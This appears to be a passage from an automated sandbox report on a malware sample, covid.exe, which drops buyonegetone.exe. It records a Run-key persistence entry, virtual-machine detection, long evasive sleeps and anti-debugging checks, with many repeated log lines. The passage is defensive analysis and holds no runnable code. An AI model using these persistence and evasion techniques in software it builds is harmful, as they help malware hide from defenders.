Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\covid.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4840 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4012 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\covid.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 FindFirstFileExW, 13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW, 18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW, 29_2_00007FF7E3D7D1B8
Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: covid.exe, 00000000.00000002.303793186.0000000001605000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}w
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mobsync.exe, 0000000F.00000002.320651387.0000023A00CE8000.00000004.00000020.sdmp, mobsync.exe, 00000014.00000002.340229538.0000023F814B8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF686048064
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605F470 GetProcessHeap, 13_2_00007FF68605F470
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 13_2_00007FF686047CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF686048064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FF686047694
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF68604FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048210 SetUnhandledExceptionFilter, 13_2_00007FF686048210
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 18_2_00007FF6FE107CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6FE108064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF6FE107694
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6FE10FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108210 SetUnhandledExceptionFilter, 18_2_00007FF6FE108210
